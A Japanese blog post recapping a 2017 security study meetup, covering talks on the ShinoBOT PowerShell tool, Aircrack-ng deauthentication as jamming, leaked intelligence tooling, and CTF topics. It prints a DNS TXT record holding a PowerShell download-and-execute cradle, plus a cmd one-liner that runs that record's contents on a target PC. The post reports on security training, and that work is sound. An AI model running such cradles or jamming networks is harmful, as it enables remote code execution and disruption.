濱⛵せっく 出張版 #3 に参加させて頂きました

面白かったです~。CTFガチ勢がいっぱいいた。
Added by kanata over 7 years ago

普段は仕事の都合により平日の勉強会は、ほぼ出れないんですが、運良く休みにできたので「濱⛵せっく」に参加させて頂きました!

  • 濱⛵せっく とは
横濱界隈のセキュリティエンジニアが運営している情報やスキルを共有し合うことを目標とするセキュリティ勉強会です。
今回は3度目の出張版です。

ちなみに第2回の記事は→ 濱⛵せっく 出張版 #2 に参加させて頂きました

濱せっく 出張版 #3 (2017/08/02 19:00〜)

濱せっくとは 横濱界隈のセキュリティエンジニアが運営している情報やスキルを共有し合うことを目標とするセキュリティ勉強会です。 今回は3度目の出張版です。 読み方:はませっく #### 対象者 セキュリティに興味のある方であれば、学生でも社会人でも無職の方でもどなたでも大歓迎です。 なお、横濱にお住まいでなくても参加できます。 ## 開催日時 * 2017年8月2日(火) * 18:30開場 / 19:00開始 * 21:00~21:30 終了見込み * 22:00 完全撤収 (それまでは参加者同士や講師陣とお話ししてて大丈夫です) ## 会場 ...

以下、感想

PowerShell版ShinoBOT @Sh1n0g1

ShinoBOTの@Sh1n0g1さんですよ!!
奥さんとDEFCON行ってたそうです。いいな私も死ぬまでに行きたい。

さてさて、お話の内容はPowerShell版ShinoBOTです。これが素晴らしいクオリティで。
普通にターミナルとして使えるんじゃないかしらw

https://shinobotps1.com/

ShinoBOT.ps1

null

特筆すべきは、これですよ・・・

DNSのTXTレコードにPowerShellのコードを仕込む

エビスさんのコメント

どういう事かと申しますと

$ dig  @8.8.8.8 shinobotps1.com txt

; <<>> DiG 9.9.4-RedHat-9.9.4-29.el7_2.4 <<>> @8.8.8.8 shinobotps1.com txt
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 52266
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;shinobotps1.com.               IN      TXT

;; ANSWER SECTION:
shinobotps1.com.        3599    IN      TXT     "powershell IEX (New-Object Net.WebClient).DownloadString('https://shinobotps1.com/download_get.php')\;"

;; Query time: 272 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: 木  8月 03 21:28:31 JST 2017
;; MSG SIZE  rcvd: 158

なんとDNSのTXTレコードに、PoweShellのコードをダウンロードして実行する手続きが設定されているんですよ…!
Windowsなら、以下で確認できます。

>nslookup -querytype=TXT shinobotps1.com
サーバー:  UnKnown
Address:  xxx.xx.xxx.x

権限のない回答:
shinobotps1.com text =

        "powershell IEX (New-Object Net.WebClient).DownloadString('https://shinobotps1.com/download_get.php');"

shinobotps1.com nameserver = ns1.domain.com
shinobotps1.com nameserver = ns2.domain.com
ns2.domain.com  internet address = 65.254.254.171
ns1.domain.com  internet address = 66.96.142.147

つまり、対象のPCに対して

for /F “usebackq tokens=*” %i in (`”nslookup -querytype=TXT shinobotps1.com”`) do cmd /c %i

を実行できればPowerShellのコードが動いちゃうんですね。
フルサービスリゾルバ(DNS権威サーバ)を自前で用意しないと実現できないですが、なんかDNSサーバ欲しくなりますねw

PowerShellコードの難読化

しかも、ダウンロードの度に動的にコードが変わる。ウィルス対策ソフトに検知されにくくする対策です。
高度…!

これ↓リロードする度に内容が変わる。

https://shinobotps1.com/download_get.php

あの日学んだ攻撃の方法を僕たちはまだ知らない @01ra66it

Twitterでよくお見かけしておりましたが、生@01ra66itさんを目撃

Aircrack-ngで、任意のAPを通信不能にする方法を照会して頂きました。
悪意のあるAPを黙らせるのに効果的ですね!

手続きの詳細は省略しますが、Aircrack-ngの一般的な使い方の応用なのでググればすぐ出てくるでしょう。

Aircrack-ngは、

  1. パケット収集
  2. パケット解析
  3. 解析結果からパスワードを発見

てな感じで通常実行するんですが、APと通信している端末が無いと「1.パケット収集」時にパケットの収集が捗らない場合があります。
そんな時に、Aircrack-ngでは、バッサリ切断する(たぶん、データリンク層レベルで)パケットを出すことが出来て、その際の再接続のパケットを収集するという技があります。

これを短い間隔で連続で繰り出せば、通信できなくなっちゃいますねw
ジャミングとして使うという発想がなかっただけに、目からウロコでございました。

ちなみに、USBのWifiアンテナを使って、それをVMwareのKaliLinux上のAircrack-ngで動かす方法は以下になりますよ(昔調べてた)

Aircrack-ngを使うためにVMwareのKaliLinuxでUSBトングルのWifiを使う

リークドコード的何か 0xH@jic

これ、、めっちゃ濃い情報で面白かったです!
私は、以下を読んでたので、コレと@0xH@jicさんの話がリンクして大変興奮しました。

読んでみるのオススメ!世界レベルでのサイバー戦争の闇が、ちょっとだけ垣間見れます。

THE ZERO/ONE

暴露されたCIAの諜報能力「Vault 7」の衝撃度(前編)
https://the01.jp/p0004740/

暴露されたCIAの諜報能力「Vault 7」の衝撃度(中編)
https://the01.jp/p0004753/

暴露されたCIAの諜報能力「Vault 7」の衝撃度(後編)
https://the01.jp/p0004767/

Wanna Cryに攻撃手法を提供した「Shadow Brokers」とは何者か?
https://the01.jp/p0005012/

再び世界を襲ったNSAのエクスプロイト
https://the01.jp/p0005312/

身代金を「本気で要求していない」身代金ウイルス
https://the01.jp/p0005325/

もはやランサムウェアとは呼べない「NotPetya(Petya)」の恐怖 (3) 3000万円で復号キー売ります
https://the01.jp/p0005338/

LT

「書籍を執筆した話」 @takahoyo

生takahoyoさん、略して生ほよさんがいた。
セキュリティコンテストチャレンジブック -CTFで学ぼう! 情報を守るための戦い方-はもう買ってた。セキュリティコンテストのためのCTF問題集も買います~

「QEMUの脆弱性と宣伝」 @hama7230

赤いサンタの帽子のTwitterの人を生で見た。略して生(以下略
Tokyo WesternsというCTFガチ勢を目の当たりにしてジョバった。

なんか今回はガチ勢が集結しているっぽい。

QEMUには浪漫があって、浪漫の先にゲストOSを突破してホストOSに到達できる。

あと、Tokyo Westerns CTF というのがあってですね。

やりたみがある。

「8/24(木) Security-JAWS、9/1(金) NW X Security-JAWSやります」@Typhon666_death

8月下旬は、何故かいろんなイベントが重なっていてツライ。どれか選ばなければ・・・

「8/26(土)MINI hardening に遊びにおいでよ!」 @delphinz

hardeningは経験ないけど面白そう。

本当は怖いXML @icchyr

XMLは、なかなか闇が深そうな匂いを感じた。
今度詳しく知りたいと思いました~。


Comments

Added by kanata over 6 years ago

THE ZERO/ONE 毎回楽しみに拝見させて頂いておりました。
編集長、岡本様のご冥福をお祈り致します。

Add picture from clipboard (Maximum size: 100 MB)